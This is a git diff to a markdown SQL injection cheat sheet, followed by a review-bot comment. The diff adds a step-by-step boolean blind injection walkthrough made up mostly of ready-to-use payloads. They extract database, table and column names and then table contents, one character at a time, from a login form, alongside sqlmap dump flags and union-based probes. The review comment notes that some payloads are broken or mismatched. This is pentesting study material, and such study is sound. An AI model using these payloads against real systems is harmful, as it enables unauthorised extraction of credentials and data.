diff --git a/Exploits/Databases/SQL Injection.md b/Exploits/Databases/SQL Injection.md index f0c734d..057bb93 100644 --- a/Exploits/Databases/SQL Injection.md +++ b/Exploits/Databases/SQL Injection.md 
@@ -57,22 +57,66 @@ SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+ ### Blind injection -* A blind injection methods tries to guess characters not by returned values but by how the DB behaves to your request +A blind injection methods tries to guess characters not by returned values +but by how the DB behaves to your request + ```sh http://example.com/?id=1' and substr((select database()),1,1) < 105 --+ ``` + ```sh http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+ ``` + * Function substr(string, start, length) -* sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump` +* sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump` + +__How do you go forward when you know, that there is a possible boolean blind injection?__ + +You want to get + +* Database name +* Table name +* Column name + +and watch out for return values, status codes, if you are logged in a session +inside the browser, etc., ... . + +Start at the databasename character on position 1, after that 2 and so on via a +POST request + +```sql +username=admin'+and+substring(database(),1,1)="a"+#&password=' +username=admin'+and+substring(database(),2,1)="b"+#&password=' +``` + +Next, find the characters of the tablename via + +```sql +username=admin'+and+substring((select+table_name+from+information_schema.tables+where+table_schema=""+limit+0,1),1,1)+=+"a"+#&password=' +username=admin'+and+substring((select+table_name+from+information_schema.tables+where+table_schema=""+limit+0,1),2,1)+=+"b"+#&password=' +``` + +Find the column_name of the table + +```sql +username=admin'+and+substring((select+column_name+from+information_schema.columns+where+table_name=""+limit+0,1),1,1)+=+"a"+#&password=' +username=admin'+and+substring((select+column_name+from+information_schema.columns+where+table_name=""+limit+0,1),2,1)+=+"b"+#&password=' +``` + +Query content of the table and columns found via + +```sql 
+username=admin'+and+substring((select++from++limit+0,1),1,1)="a"+#&password=' +``` ### Union based -Union based injections is an incremental and cautios approach. -Start by trying to provoke errors to validate a possible injection. +Union based injections is an incremental and cautios approach. +Start by trying to provoke errors to validate a possible injection. * __First method__ check by order until error occurs + ```sql ' order by 1 -- - ' order by 2 -- -
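Review bot: the second blind example in this hunk has unbalanced parentheses: `http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+` opens five and closes three, so as written it is not a valid predicate; it should read `and ascii(substr((select database()),1,1)) = 115`. The first example compares `substr(...)` (a one-character string) against the integer `105`, which only works by implicit string-to-number coercion; since the paragraph is about comparing character codes, wrap it in `ascii()` like the second example so the two lines show the same technique. The new POST walkthrough targets MySQL (`information_schema.tables`, `information_schema.columns`, `#` comment), but the sqlmap line two bullets above says `--dbms=sqlite`, which has no `information_schema`; either note that the walkthrough is MySQL-specific or adjust the sqlmap flags to match. The empty `table_schema=""`, `table_name=""` and the final `substring((select++from++limit+0,1),1,1)` are clearly meant as fill-in placeholders, but nothing says so; mark them (for example `<column>`/`<table>`) so a reader does not copy them literally. Finally, the retained text keeps the grammar errors "A blind injection methods tries" (should be "A blind injection method tries") and "Union based injections is an incremental and cautios approach" ("are", "cautious"), and the `-`/`+` pair on the sqlmap bullet differs only in trailing whitespace, which makes the hunk noisier than it needs to be.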